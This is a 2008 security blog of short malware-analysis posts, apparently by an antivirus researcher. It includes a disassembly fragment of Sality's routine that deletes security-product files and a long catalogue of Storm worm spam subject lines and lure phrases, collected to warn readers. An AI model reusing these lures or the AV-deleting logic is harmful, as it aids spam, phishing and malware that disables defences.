Wednesday, December 31, 2008

Conficker ....

Picture speaks a thousand word ...

Monday, December 29, 2008

Reminder ...

Just read this part in one of the SDK I got ...


6. Reverse Engineering. You will not reverse engineer, decompile, disassemble or otherwise attempt to discover the source code of any SDK Component provided to you in compiled or object code format except to the extent you may be expressly permitted to decompile under applicable law.


nuninuninuninuninuninuninuninu ...

Monday, December 1, 2008

Ruxcon 2008

Presentations that I liked ...

Attacking Rich Internet Applications - Kuza55, Stefano Di Paola Uninitialized Variables <- i just wish they gave more hours for this talk (maybe removed the next presentation and continue with Paul Ducklin's presentation hehhe ... IMO)
JavaScript is Harder than you Think - Paul Ducklin <-hands up
GPU Powered Malware - Daniel Reynaud <- interesting one, noteworthy
Finding, Exploiting, Automating - Daniel Hodson
Targetted OLE2 Attacks, The New Black - Peter Taylor <- my wife liked the presentation so its worth mentioning
Browser Rider: Your way to Fun Browsing - Nik Mijatovic, Ben Mosse
Browser Memory Protection Bypasses in Vista - Mark Dowd <- as expected, great talk

This one deserves a distinction between the topics above, the best one for me and for some guys i know.
Netscreen of the Dead: Developing A Trojaned Firmware for Juniper Netscreen Appliances - Graeme Neilson

Thursday, November 6, 2008

Win32/MS08-067!exploit payload

Nothing much to say ....
Just an image of the decrypted payload ...

Basically, the APIs are for downloading and executing the downloaded file.

Now some packet-talk ...

Make sure your systems are patched to prevent infection of this malware.

Wednesday, October 29, 2008

So Fake ....

I found this one in one of the binaries of Win32/FakeAlert ... as the name says fake alert ...

Monday, September 29, 2008

Install ActiveX controls to repair your computer ?!?!?!

A picture tells a thousand story ... but this one only tells one thing ...

Dont be fooled by the deceiving behavior of this rogue software ... Vista Antivirus 2008 .

Wednesday, September 24, 2008

Sality ....

List of predefined security files that it deletes ...

well aside from the *.vdb, *.avc signature files ...

  • A2GUARD.

0103B94E CALL DWORD PTR DS:[105316C] ; kernel32.FindNextFileA
0103B956 JE 0103BA22
0103B962 MOV BYTE PTR SS:[EBP+EDX-548],0
0103B970 PUSH EAX
0103B977 PUSH ECX
0103B978 CALL DWORD PTR DS:[1053160] ; kernel32.lstrcatA
0103B984 PUSH EDX
0103B985 CALL DWORD PTR DS:[1053164] ; kernel32.lstrlenA
0103B98B SUB EAX,4
0103B997 PUSH EAX
0103B998 CALL DWORD PTR DS:[1053164] ; kernel32.lstrlenA
0103B99E CMP EAX,4
0103B9A1 JLE SHORT 0103B9D0
0103B9A3 MOV ECX,DWORD PTR DS:[1054188]
0103B9B5 CALL DWORD PTR DS:[10530B4] ; kernel32.lstrcmpiA
0103B9BD JNZ SHORT 0103B9D0
0103B9BF PUSH 1
0103B9C8 CALL 0103B79C


0103B7A3 JNZ SHORT 0103B7BD
0103B7A5 PUSH 0
0103B7A7 PUSH 2
0103B7AD CALL 0103CAC0
0103B7B2 ADD ESP,0C
0103B7B7 JNZ SHORT 0103B7BB
0103B7B9 JMP SHORT 0103B7D7
0103B7BB JMP SHORT 0103B7D3
0103B7BD PUSH 20
0103B7C3 CALL DWORD PTR DS:[1053080] ; kernel32.SetFileAttributesA
0103B7CD CALL DWORD PTR DS:[105307C] ; kernel32.DeleteFileA
0103B7D5 JMP SHORT 0103B7D9
0103B7D7 JMP SHORT 0103B7BD
0103B7D9 POP EBP


Thursday, September 18, 2008


My reference ....

w0sacerqippat...3 - 010049c0
rhuxnodalil03125...4 - 01001ab5


Wednesday, September 10, 2008

Spam email template used by not so famous variants of Storm worm

Here is a list of subjects and contents that I found while analyzing current not so famous variants of the Storm worm also known as Peacomm (Symantec), Nuwar (Trend Micro & McAfee), Zhelatin (Kaspersky), Sintun / Pecoan (CA)

It can be in the subject or content so please be aware of unexpected emails you receive with the following subjects

> Stock Market related spam mails <

#1 Pick of the week
Another celebration
Breakout news
Did you get in today?
Diverse operations bring great things
Don't wast time, this is the opportunity
Dont let the price decieve you
Emerging markets
Everything is looking great
Get it on your watch list
Get the edge on the next stock
Get with the best pick
Great increases
Great news from the floor
I know you want it
Immediate attention needed
Important market tip
Look at the news and the charts
Make the move now
Make your money
Move on it now
News is out
News when you need it
Now is the time
Number one pick of the week
Our subscribers are the first we tell
Our top recommendation
Posted today
Price continues to climb
Rare investment opportunity
Read the profile
Read up on this before Monday
Right Now, go look
Set your bid now
Shares continue to increase
Stock Information
Stock News
Stock Watch Information
Stocks that are moving
Take advantage of this one
This is a winner
This requires your attention
Timely information
Watch it trade
We are so excited
We wanted to share with you
Why it should be in your portfolio
You can do it
You know what to do
You need this
[re:] good company
buy low sell high
do you want to double your money
don't wait read it now
make it a great week
market watch
still on top
take a look at this
the best buy is now
they are still adding on

> E-Card related spam mails <

A Digital Card from someone who cares.
A card for you
A greeting for you
A greeting from ...
An Ecard for someone special
Greetings from...?
Here is Your Ecard
Here is your E-greeting
Open now for your eCard
Someone Made you a card
Someone is thinking about you.
Someone sent you an Ecard
Someone sent you an Ecard.
This is a Card for you.
This is for you.
You Have An Ecard
You have a new eCard from...?
You have a new greeting
You have an E-Card from...?
You have received an eCard
You've received an E-Greeting
Your Digital Greeting Card is waiting
If you want to see your Ecard,
If you would like to read this greeting,
If you would like to see your Card,
To Enjoy your Ecard,
To get your Ecard,
To get your message,
To recieve your greeting,
To see your card,
To view your Ecard online,
To view your card,

> Spam promoting an online pharmacy <

1 month-1 inch
1 week - 2 kilos off
10 Mistakes All Men Make!
10 ancient secrets of perfect intimate life.
10 mistakes every man makes.
10 most common reasons for failures in bed.
10 reasons to cure ED as soon as possible.
10 reasons to take enhancing medicaments.
10 reasons why you need tocureED as soon as you can.
10 secrets of better xxxlife!
10 secrets why online chemists are so cheap.
10 simple tricks to become more perfect
10 things to do to enhance your personal life.
10 things to do to your lover.
10 things to tell a naked woman!
10 things to tell a naked woman!
10 ways to act in bed longer!
10 ways to act in bed longer!
10 ways to control your desire!
10 ways to free her desire.
10 ways to make your lover happier.
10 ways to release your male power
100% Safe To Take, With NO Side. Helps your intimate life.
12 more inches aint so bad, dont you think so?
15 Mistakes Every woman made!
15 Steps For Better Love Life
15 Ways to act Longer in bed!
15 Ways to act Longer in bed!
15 ways to make her finish!
15 ways to make your xxx-life much better!
2000 health products to choose from.
22 Things You Can Do To Satisfy Your Gf
27 Natural Ways to Boost Your Love Drive.
3 month supply of better intimate life is waiting for you
3 month supply of pleasure in bed.
3 month supply to forget about failures in bed.
3 month supply to loose 3 kilos a week.
3 months supply of perfect intimate life.
3 simple ways to make any night unforgetable.
3 ways to start a new intimate life full of pleasure
3 ways to start a new intimate life full of pleasure and delight.
3 ways to start a new xxxlife.
3 ways to turn any woman to a fountain of response and desire.
3'' enlargement is no longer a myth.
36-hour cure for perfect night with your gf.
365 Ways to Enhacne Your Love Life
36hours boner, thats impressive!
4 ancient greek secrets of rich intimate life
4 ancient greek secrets of rich intimate life.
4 times cheaper than any other local chemist. Online Canadian Chemist.
5 ancient egypt secrets of perfect intimate life have been discovered.
5 meds every woman needs.
5 reason why men cannot satisfy women.
5 tricks to be more perfect.
5 ways to make your love more passinnate
5 ways to make your love more passionate.
5 ways to safeguard intimate sex life.
6 month-pack for best results and huge savings!
6 month-pack for best results and huge savings!
7 reasons why most men cant satisfy their women.
7 things to buy for your lover.
8 thmgs every woman makes in her intimate life.
9 Things You Can Do Right Now To Boost Your Happiness
90% of mentake this and feel happy.
A better way to give up smoking.
A health portal which gives you an insight about your physical wellbeing.
A key to your success in bed.
A magic pilule to make your lady happy.
A simple way to increase your conrolthat you can use tonight.
A small thing that makes your lady happy.
A small thing to make your woman happy.
A solution to your failures in bed.
A solution to your failures in bed.
A wide selection of most popular goods for health online.
ANTI-ED solution know from the ancent times!
Add more Pleasure to Your Intimate Life.
Add more fire into your intimate relationship.
Add more fire to your relations.
Add more passion to your relations.
Affordable and easy male and female enhancing.
After crazy night she will wanna be with you always.
Agree to be sick! Noway!
Agree to be sick! Noway!
All answers to male improvement questions.
All answers to potence improving questions.
All answers to questions about your state.
All girls around will be yours.
All guys need this
All guys take this.
All men do it.
All special meds for your most loved ones.
All that she is dreaming about during long nights.
All that she is dreaming about during long nights.
All that she is dreaming about.
All the hottest ladies on the beach will be yours.
All weapons for battle against diseases!
All weapons for battle against diseases!
All you need is a blue pilule.
Amazing growth within just one short month!
Amazing growth within just one short month!
America's online chemist serving your needs for health products, health information and pets care services.
American best lover is YOU.
Ancient greeks used this to treat their male problems.
Ancient secret for perfect intimate life.
Ancient secret of treatment bad condition.
And you will know what the true love is.
Are you ready to boost your self-esteem and start feeling great life?
Are you ready? she is!
Are you ready? she is!
Ask us how to enhance your relations with gf?
Ask us what is the secret of xxxmovie starts and we will answer your question.
Bad health report? Consult us.
Be beloved by her tonight.
Be better satisfied with your xxxlife.
Be careful. Dont put your healthat stake, we carry everything for your health.
Be extremely careful, chosing antiED cure method.
Be happy!Be really healthy!
Be happy!Be really healthy!
Be healthy at low cost.
Be her owner in bed.
Be her winner tonight.
Be nominated for the best lover of the year with our brand new enhancer.
Be smarter, get your medicaments online.
Be the ladies' hearts ruller!
Be the master of lovemaking art.
Be the only macho man around.
Be the stud in 2008!
Be the stud in 2008!
Be the winner every night with magic pilules.
Be the world best lover.
Be too hot and she wont resist.
Be too hot to resist!
Be too hot to resist.
Beach season is near, ensure your potence on vacation.
Become ED-resistant MAN.
Become a new man.
Become women's idol.
Best doctors recommend this.
Best health products at low cost.
Best intimate life enhancer.
Best of the best products for your health are here.
Best of the best products for your health.
Best places to get medications online, best strategies to save.
Best prices for best intimate living.
Best prices for licensed cures on the internet.
Best prices to cure ED.
Best solution, if you need products for health.
Best way to giveyour love a boost.
Better intimate enhancer that is cheaper and more faster than any other on the market
Better living through Canadian chemists.
Better living through Canadian chemists.
Better xlife, better fun.
Bigger, harder, longer lasting
Blue colouerd-tab at your service all nights long!
Blue pill will make you as hard as stone and you will act longer!
Blue pilule works, you win.
Blue pilule, when you do not need control your desire.
Blue pilule. Because sometimes she wants to play.
Blue pilule. Because sometimes she wants to play.
Bluepill will help you have a lifetilong fiesta with your chixs!
Bluepill will make you the best pornstar!
Bluepill will make your hard stone even harder!
Bluepill will restore your happiness tonight and evey night!
Boost a growth of your intimate part!
Boost your acting in bed.
Boost your action in bed
Boost your action in bed.
Brake all records in love marathon.
Breakthrough in male enhancing.
Breathe a new life into your intimate life.
Bright and joyful intimate life.
Bring joy and pleasure to her life.
Bring joy to het life with antiEDs
Bring more fun to your xxxlife!
Bring more happines into your night life.
Bring more joy to your life, get a bluepill!
Bring more joy, happiness and pleasure to your night life.
Bring more pleasure to your xlife!
Bring passion and desir back to your life.
CHANGE your night life in five minutes.
Calabrate a victory in intimate life.
Can your health problems be solved within a month? Yes, they can.
Can your male problems be cured with a pilule?
Can your male problems be cured with a pilule?
Canadian Chemists-best solution for your health needs.
Canadian doctors we trust.
Canadina chemist - best solution to all your health problems.
Canadina chemists help you save 90% on medical bills.
Canaina health shop is found to be good for you.
Cant act better in bed?
Cant find a good e-chemists? Check this out.
Cant find a good online chemists? Check this.
Casanova style of life.
Celebrate independence day with a hard boner.
Celebrate your victory in love.
Change your condition for better.
Change your nightlife for better.
Check for most attractive prices for meds!
Check for most attractive prices for meds!
Check this potence ensurer, its great, mate.
Claim for freee bluepills!
Come closer to healthy and more passionate intimate life.
Complimentary health supply at Canadian Chemist.
Contact us to order and any other health products online.
Cut your expences on mdes!
Cut your expenses on medication, buying from Canada.
Cut your payments on medications.
Cutting cost on 2000 medications..
DO NOT leave her unsatisfied.
Daily new products at our chemists
Dear patient, we would like to advice you Canadian Chemis for all your health needs.
Deeper penetrator!
Disappointed with your bad performance in bed?
Discover online Canadian Chemists
Discover your online health consultant.
Do not let illnesses exist in your life.
Do not let illnesses exist in your life.
Do not let the desease spoil your life!
Do not let them mock at small weener!
Do not let them mock at small weener!
Do not play with your fortune, keep some blue colored-tabs with you!
Do with you gf what millions of man do everyday.
Do you care about her enjoyment
Do you care about her satisfaction.
Do you feel depending on your doctor?
Do you know that using on line chemists is more safe and convenient?
Do you know what she is dreaming about during long nights.
Do you like wild nights?
Do you think that your health is at risk?
Docs approve and recommend online Canadian Chemist.
Doctor's recommended soluion for most intimate male problems.
Doctors recommended source for good health products.
Don't be last to know that Canadian Chemists is offering you all health products you may need.
Donation for your intimate life.
Dont allow intimate problems destroy your life, we have the solution for you.
Dont be left behind because of bad health.
Dont be the last to know about Canadian chemists.
Dont blame your doctor for not telling you about us.
Dont forget your enhancers, when going to the party.
Dont get lost in her eyes because of small dimensions.
Dont give up on loosing hair. You can stop it right today.
Dont hesitate if shee needs your response right now.
Dont know how to please her every night? Ask us how.
Dont let excess weight spoil your life.
Dont let it fall, when you need it up.
Dont let paim and ilness happen in your life.
Dont let sickness spoil your vacation.
Dont let your intimate life turn into disaster.
Dont let your wife be nagry with you because of bad potence.
Dont let your xlife go down due to lack of bluepills, get'em here!
Dont look fat and stupid this summer.
Dont look fat and stupid this summer.
Dont miss a perfect opportunity to get in shape again.
Dont overdose antiEDs, or you can have tonns of pleasure.
Dont play with your x-life, get bluepills with you!
Dont runaway from your male problems, let us solve them.
Dont spoil your efforts to satisfy her.
Dont treat her carelessly
Dont treat your condition carelessly
Dont try your luck in bed, ensure your potence with ANTIEDs.
Dont want to shy your personal life?
Double your pleasure and benefit from world know Canadian Chemist.
Double your pleasure and benefit in bed.
Dr. Smith is recommending.
Dream of being healthier?
Dreaming of rich xxx life?
Drive her crazy tonight.
Drive her wild tonight.
E-store selling full range of health products from UK and US.
Eight Natural Ways to Boost Your Potence.
Enhance your intimate response.
Enhance your possibilities in bed.
Enhance your relations with her.
Enhance your relationships with her.
Enhance yur hot summer nights.
Enjoy The Intimate Life You Deserve
Enjoy feeling and looking in good shape.
Enjoy full bedroom life.
Enjoy intimate life you deserve.
Enjoy the healthy life you can have.
Enjoy the life to the full!
Enjoy your life! And let us take care of your condition.
Enlarge your PE and your mind will follow!
Enoy your wife. Anytime. Anywhere.
Ensure your potence and make love everywhere
Ensure your potence and make love everywhere
Euro best health supplier.
Even Brad Pitt takes blue pilules!
Even doctors get meds from us.
Ever heard of 4 inches enhancing or 2 weeks?
Every 2 men out of 3 need this to maintain normal intimate life.
Every night will be the night of pleasure if you take the right antiED's.
Excelent improving effect.
Excellent effect on your condition.
Excellent effect on your male power.
Excellent improving effect on male health.
Experience more pleasure from perfect intimate living.
Experience the true pleasure
Experience up to 60 minutes prolonged pleasure.
Experince more long and continous pleasure.
Expnd yourself and experience wonderful challenges.
Exposing xxxstars secrets today.
FIghting with illness?
FIghting with illness?
Fast and simple way to drop kilos and gain good health.
Feel all the benefits of magic blue colored-tabs!
Feel the power of youh at any age.
Few simple steps to dominating in bedroom.
Fill in your medication subscription.
Finally your new healthy life.
Finally, a safe, permanant, doctor's approved EDSOLUTION!
Find a personal health assistant now.
Find out how you can change your love life with our wonderpills
Find the lowest prices for online health products.
Find your love stick gain here.
Find your own personal health assistant.
Fine medications to fit your budget.
Five start health products
Five start health products
For better control and improved love life.
For those who are looking perfect enhancers.
For those who think that antieds gonna change nothng.
For those who want to be home xxxstarts.
For those who want to know how to prolong pleasure in bed.
For your sweethearts only.
Forget about ErDys.
Forget about bad intimate experience.
Forget about failures in bedroom for 3 month.
Forget about huge spendings on medication.
Forget your bad experience in love.
GLobal potence ensurer!
Get a magic tool for lady's satisfying.
Get a secret weapon of xxx-stars!
Get an instant cut off.
Get back to slim shape again.
Get equiped to fight against ilnesses.
Get equipped for night love battle.
Get fit for summer beach season.
Get harder, last longer, penetrate deeper.
Get help from medical doctor listing in the United States
Get hot in a while.
Get in shape Fast.
Get it up fast and simply
Get laid with the hottest ladies of the web!
Get ready for wild summer nights.
Get ready to improve your night life.
Get ready to lay right now
Get ready to sleep ith her for 15 mins
Get rid of bad health.
Get rid of bad intimate experience.
Get rid of bad intimate living.
Get the latest news on your health.
Get the most health for your money here.
Get your doctors recipes here.
Get yourself in shape.
Girls will call you Largissimo.
Give her wonderful hours of pleasure.
Give her wonderful hours of pleasure.
Give her your attention every night.
Give you lover new intimate feeling.
Going to the beach do not forget to loose many kilos
Going to the party do not forget intimate enhancers.
Going to the party do not forget to take blue clored-pill with you to ensure your potence!
Good changes for your intimate life.
Good health is what you really need!
Good health is what you really need!
Good potence. Good or bad?
Good solution for all your needs!
Good solution for all your needs!
Gooooood day for all your health needs is today.
Great summer sale of medicaments.
Great variety of health products
Great variety of health products.
Great variety of little helpers for your health.
Great variety of products for your health.
Greater male volume and power enhancing.
Grow bigger in her eyes.
Half a year supply for better enhancing and less cost.
Have all the countermedicines online.
Have all the medicaments at your hand.
Have an unforgetable night with a blue pilule.
Have control over xxxlife again.
Have healthier and longer life.
Have her photo and blue pilule in your pocket.
Have instant access to yourhealth supply.
Have more fun and pleasure in your intimate life.
Have new nights with your wife.
Have perfect health in an imperfect world.
Have yoour own supply of perfect intimate living.
Have you ever dream of covering your needs at one place?
Have you seen this chemists?
Have your ever wondered what to do to your wife after 5 years?
Have your intimate life inspired by a blue pilule.
Have your intimate life inspired by a blue pilule.
Have your personal supply of perfect lovemaking life.
Have your recipes here.
Having trouble keeping your tines straight?
Having trouble keeping your tines straight?
Health care center answering your health questions.
Health life starts from here.
Health life starts from here.
Health of those ones, you love can be at stake.
Health problem solver.
Health problems best solution.
Health recovering solution just for you.
Health security news, your attention is required
Healthy Ways to Male Enhancing
Healthy intimate life is a key to your success.
Healthy life improvement.
Healthy life is not a myth anymore!
Healthy life is not a myth anymore!
Healthy life starts from canadian doctors.
Healthy life? Easy!
Healthy life? Easy!
Healthy news mail.
Help people live longer,happier, healthier!
Helping Americans become happy and healthy
Helping people spend nights happily
Helping you becoma healthy day by day.
Her hidden dream about great nights with you.
Here is the message from your doctor.
Hey, hot man, hot woman is waiting for you.
High quality chemists. Do not miss the chance.
His girlfriend is pleased and yours?
Hoow to live healthier without doctors.
Hot chixs.Ponetnce.Blue-colored-tab.
Hot pornstars secrets revealed. Magic Blue colored-tab!
Hot summer nights will be even hotter.
How To Boost Your Love Life!
How avoid being ripped by doctors.
How different is your loving life?
How have her all night long.
How interesting is your love life?
How make any night unforgetable.
How make pleasure more durable
How make your gf 10 times happier.
How make your gf happy 5 times a day?
How much can you save by purchasing from online chemists?
How much health do you need to be happy?
How please your gf 5 times a day.
How take her all night long.
How to Kick-Start Your Intimate Drive
How to achieve good potence in 30 minutes.
How to be more scilful in bedroom.
How to be more skillful at bed.
How to control your weight.
How to get out of bad health.
How to get rid of bad xlife?
How to get rid of poor intimate life.
How to improve your relationship
How to know if she doesnt like your performance in bed.
How to last longer making love and have more powerful feelings.
How would you like to spend your night with gf?
I hope this will help you solve all problems with health!
I hope this will help you solve all problems with health!
If good health is what you really need, then its time to visit canadian chemists.
If good health is what you really need.
If good potence is what you are dreaming about.
If long dimensions is what you dreamt about.
If she has touched your heart an you want to spend a night with her, ensure your potence.
If she needs your attention everynight.
If she needs your response this night, do not hesitate.
If you are looking for a good way to improve your relationship.
If you are looking gor good health, itstme to visit Canadian Chemists.
If you are the one who needs male enhancing, we have a better solution for you.
If you are thinking about enhancing, check this out.
If you cannot act the way you want, take some blue-coloured pills!
If you cannot satisfy your woman, we will help you.
If you ever wonderedhow porn starts can act so long.
If you feel desperate on returning inimate living.
If you look stupid in bed
If you look stupid in bed
If you need a recipe no need to go to a doctor.
If you need healt products, Canadian chemist is the best solution.
If you need health products, Canadian chemist is the best solution.
If you need to improve your intimate life!
If you need to improve your little friend.
If you need to improve your littly.
If you need to improve your nights.
If you thinking about your potence, visit us.
If you want a decent night, get a magic pilule online
If you want to get bigger, check this site out.
If you wish not to visit doctors any more, read this.
If you wish not to visit doctors any more, read this.
If your health needs fix
If your potence has been compromised.
If your xxx life is not working the way you want it to
Important changes for your love life.
Important-Your Health is at stake.
Impress your Ladies!
Impress your Ladies!
Impressive enhancing results.
Improve your health and well-being.
Improve your health this summer.
Improve your love making art.
Improve your manhood with these wonderful male enhancing products.
Improve your organism state.
In Canadian Chemist we trust.
In questions of health you can rely on us.
Increase your male drive to a level never before thought possible.
Increase your male power.
Inexpensive medications for men and women.
Instant intimate relief
Intimacy and your love life.
Intimate life booster pack
Intimate life booster pack.
Intimate life doping seller.
Intimate stimulation for her.
Introducing you a new online health store.
Invade her.
Invitation to new e-chemist opening.
Is Your Intimare Life All Fireworks or Less Than Explosive?
Is your intimate life buried beneath time gone by, old feelings or even age?
Is your intimate life on the back burner?
Is your love stick as hard as stone?
Is your personal life perfect?
It helps you solve all health problems!
It is high time for you to try our safest, doctor approved enhancing method.
It make shock you, but you will have it up for 36 hours.
It will rise faster and stay up longer.
Its amazing how your bedroom life can change
Its amazing what one little pilule can do.
Its amazing what one little pilule can do.
Its time for perfect enjoyment in bed.
Its time to visit us for good health.
Join the biggest community of man that cured their male intimate problems
Join the biggest community of successful men.
Just do her.
Just for you and your beloved one.
Just you, she and blue pilule will make the night unforgetable.
Keep it up fast and long.
Keep it up fast and simply.
Keep your relations fresh.
Killer discounts on all pilules.
Know what can bring passion and desire into your life.
Largest selection of medication products.
Last all night easily.
Latest news from your doctor.
Leading supplier of Canadian chemists
Leading supplier of Canadian chemists in now available for you.
Leading the intimate revolution.
Learn how and when blue pilule works best for you.
Learn how and when enhancing products work.
Learn how make your GF happy.
Learn how to prolonge your pleasure in bed.
Leave no place for ED in your intimate life.
Leave no place for illness in your life.
Let everyone know about your success in bed.
Let her do everything for you this night.
Let her dream about great nights with you come true tonight.
Let magical changes happen in your night life.
Let us do the work of making you and your gf happy every night.
Let your intimate dreams come true!
Let your intimate wishes come true.
Light her eyes with true desire.
Like our medications, love our pilules.
Limited time offer, get one of three antieds free with every product.
Live life to the fullest.
Living the life of Casanova.
Look what she came across.
Looking for a perfect blue pilule?
Looking for a perfect night? Get a blue pilule.
Looking for better night spendings? Try this and your wife wont leave you tonight.
Looseweight naturally.
Loosing kilos easily.
Loosing kilos fast and safe.
Low cost enhancers for men and women.
Low cost, secure and discrete online chemists.
Low prices for high quality. Medications.
Low-cost, full stock, secure and discreet online chemist store.
Lowest prices for best products!
Luck has no importance in good intimate life.
Luxury health products for your most loved ones.
Make a pleasure more durable.
Make her dream of you avery day and night.
Make her happy and show how you love her.
Make her intimate world beautiful.
Make her long for you every night.
Make her nights special.
Make her scream in pleassure, everynight.
Make her want you everynight.
Make her wildest dreams come true
Make sure all your health orders have been fullfilled
Make sure that she is well satisfied every night.
Make your babymaker stonehard.
Make your gf nights happier.
Make your girls happier.
Make your intimate nights longer
Make your intimate nights longer
Make your love stick as hard as you want it to be.
Make your nights hot.
Make your nights of love as long as never before.
Make your nights of pleasure longer.
Make your own supply of health.
Make your wife happier today.
Make your woman happy and increase potence.
Make yourself healthier.
Making prices for medication products dirt cheap.
Male enhancing is possible, learn how and what works best for you.
Male enhancing products have been reviewed and evaluated.
Male enhancing products review.
Mans tru beauty is in his pants.
Maximize your intimate performance.
Medication prices killing you?
Medications for consumers and medical health professionals.
Medications you've been in need.
Medicine's version of "MIRACLE-GRO."
Megasite for your health needs.
Memorial day sale, 80% off al the prices.
More health with less expenses.
More pleasure for you and your lovers.
More pleasure wit less efforts.
Most famous ichemists in th world.
Most male problems can be treated.
Most reliable source for your medical needs.
Mot of your health coms from good medications.
Much, much bigger than you ave it right now.
Multiple her pleasure.
Multiple your pleasure.
Necessary chnages in your xxxlife.
Never lose hope to improve!
Never lose hope to improve!
Never lost hope to cure!
Never lost hope to cure!
New Ichemists at your service.
New products everyday at our chemists.
New products everyday, online chemists where you can find a good source foryour needs.
Night should be full of pleasure.
Nights will be longer than they should be.
No need to visit a doctor again to get medications you need.
No pain, no surgery, 3 months pack will enhance your power for 3 inches.
No painful surgery, get 3 month supply for ultimate enhancing.
Not satisfied with your xliving?
One of the leading online health shops that promote medications.
Online Canadian Chemist - we care about Your Health!
Online Chemists provides you with access to all your health needs from a chemists brand name you know.
Online chemist shop.
Online chemist where you can save on all your health needs.
Online largest selection of medicaments.
Online place to get cheap and free medications.
Online store, providing goods to patients ar discount price.
Only 3 month are required for your ehnancing, and she will notice that.
Only best blue-pills here!
Only best blue-pills here!
Only best medicines here.
Only for your lover.
Only safe medications online.
Or specialists will find the best solution to cure all your health needs.
Order producs for your health and get fee delivery right at your door.
Order with us and save your chemist bills up to 80-90%
Our magic blue colored-tabs will help you to take her to paradise!
Our site contains health information and a wide range of products to suit your health needs
Our store specialization is natural remedy for men and women.
Over 20000 health and beauty products online
Over 20000 products for health and beauty online.
Over 85 medsnames On our Online Store
Own her nights.
Painkiller that makes your sufferings go away.
Patients can access our chemist via the Internet 24/7
Pay less for perfect health.
Perfect ED-solution, known since the roman empire!
Perfect health? Easily.
Perfect lovemaking art 4 you.
Perfect making love is not a joke, read it.
Perfect making love is not a joke, read it.
Perfect solutions to have it hard as stone!
Perfect way to gain more health.
Perform all her desires
Permanent, doctor approved male enhancing products.
Place, where I get cheap meds.
Please, read your health statement.
Pornstarts top secret revealed.
Potence enhancers at their best.
Preapre for positive changes in your life.
Prepare for "hot" summer nights.
Prepare for the crazy olimpic nights.
Presenting you summer nights of pleasure.
Products for yourhealth from certified chemists.
Prolong pleasure with wife.
Prolonge your pleasure at nights.
Proven enhancing secret!
Providing better solution to your health problems.
Purchasing from us can result in much larger savings.
Purchasing online from a Canadian chemists can yield much larger savings
Put her in trembling fire of pleasure.
Put her to sleep.
Put your mate in fire of passion.
Quiet prices for must have products.
Reach new heights of intimate lufe.
Real enhaning products that always work.
Real men do not play with their gf's, they win.
Reasons for falling hard and fast?
Reduce your hair lost.
Regain Or Increase Her Intimate Drive
Regain active love life
Reinvent your love life in just one weekend.
Release your most wild dreams tonight.
Respected Canadian Chemist. Millions of customers cannot be wrong.
Resplendent beauty of young life.
Restore your confidence in bed
Restore your intimte life.
Restore your youth intimate life.
Return wonderful nights of pleasure.
Returned beauty of youth.
Revealing Casanova secrets.
Revealing the secrets of pornstarts!
Rich intimate life easily
Rise fast and stay up longer.
Ruke the ladies hearts!
Safe cure without a doctor.
Safe way to get preparations for your health.
Safest and approved method of male enhancing
Safest and approved method of male enhancing
Satisfy her IMMENSELY
Save more on health products you need, gettin them from online chemists.
Say farewell to ED!
Say goodbuy to bad condition.
Say goodbuy to failures in bed.
Scientific breakthrough in male enhancing.
Search our hot new health and beauty products, plus more online today.
Secret tiny helper for men's potence.
Secret tiny helper for men.
See your love tool growing.
Several steps to masculine power.
Several tips to make your woman happier.
Sharp your pleasure tonight.
She cant forget those nights, when you took blue pilules.
She will be a nughty girl again.
She will be glad if you can keep it up longer.
She will beg you to keep going.
She will give her heart to you for incredible night
She will give her heart to you for incredible nights.
She will give her heart to you.
She will give herself to you.
She will look at you differently.
She will love making love with you.
She will meet you all days with all her love.
She will never stop loving you, because you get medicaments from i-chemists.
She will say you thanks for this!
She will sure like how those pilules enhanced you.
She will want make love with you.
She will want to spend a night with you, buddy.
She wont let you take a break at night.
She wont tell you what works best for you, but we can do it.
Shockin revelation about your love life.
Shop for pilules,perfume,care skin,fragnance,health care,make up,beauty products.
Show her your attention everynight.
Show your sweetheart how much you love her.
Shy of your personal life?
Shy to buy antiEDs at local store? Get them from online Canadian Chemists.
Sick and tired of getting down after intercourse started?
Site for selling top products for health care.
So, how's your personal life these days?
Solve your health problems within a month.
Some helpful information on weight losing products.
Special treatment for your beloved one.
Spend endless nights of pleasure.
Spice up your senses in bed.
Spice up your senses in bed.
Spicy your bedroom life.
Start a new life in your bedroom
Start enjoying your xxxlife!
Start new intimate life from today.
Start protectingyour health right now.
Still cannot satisfy her?
Still wonder, whe she is laughing at you? Bluepilule will improve your nights.
Stole her heart with awnoderful potence ensurer.
Stop destructing your health, we have everything to cover your needs.
Stop dreaming of better intimate life, start having it.
Stop self - destroing and become better day by day.
Stop suffer from bad health, improve it right now.
Strenghth and largeness for you.
Strenghth and power for you.
Summer cut off on weight losing products.
Summer is coming, best time to drop off some kilos.
Summer is on the way, do not forget of all requred-tabs.
Summer sale on health supply.
Super-size dreams come true!
Super-size dreams come true!
Surprising ways to increase your love drive.
Survey of 10 popular male enhancing products.
Sweet deals for health products.
Sweet summer offer , 80% cut on all chemist products.
Take all your health supply online.
Take her to the seventh heaven of pleasure.
Take the blue pilule and she will show you how far the rabbit hole goes.
Take the blue pilule and she will show you how far the rabbit hole goes.
Taking this remedy for a few months will preserve your love tool.
Tastes great, more filling
Ten inches long... and growing
The Best Way to Boost Your Love Life.
The Most serious potence problems now have the solution.
The best intimate experience you've ever had.
The best night of pleasure you ever had.
The best plase for great savings on all your medical needs.
The best time for improvement is summer.
The brand new intimate enhancer, available only at CanadianChemists.
The easiest way to become healthy
The first profitable health shop.
The key to your condition is in your hands.
The largest network of i-chemists.
The lates development in weight losing.
The latest cure for serious male problems.
The latest update in ED treatment.
The most reliable source for cheap and quality health products.
The most reliable source of cheap and quality recovers!
The most reliable source of cheap and quality recovers!
The only chemists with moneyback guarantee.
The trusted online health shop for buying medications online.
The ultimate source of pleasure.
The ways to fine-tune your feelings tonight.
The widest collection of finest meeds online.
The widest e-assrtment of medicaments.
The wonderful xxxfantasy most men have!
The world's largest online health shop.
There is only one way to act longer.
There's a shop for beauty products, pharmacy called Canadian Chemists.
Things for YOU do to keep your loving life spicy.
Think You Know Much About "Intimacy"?
Think abou your ondition today and live longer and happier with our help.
Think about your health.
Thinking about your enhancing?
This blue pilule will make a better man of you.
This could seriously boost your love life.
This health shop will cover all your needs.
This is extremely important for your health.
This is wonderful that you can have perfect intimate life now.
This night she will do everything for you.
This small blue-colored-pill will turn you to supermacho!
This uk online chemist sells cheap quality goods.
This will bring more joy and energy into your intimate life.
This will make your nights unforgetable.
This will put you to sleep, for sure.
Thousand products, helpful to your health.
Time for good xxxlife has come.
Time for perfect enjoyment in bed.
Time for perfect nights with your gf.
Time is pleasure, make it more durable.
Time to be a MAN.
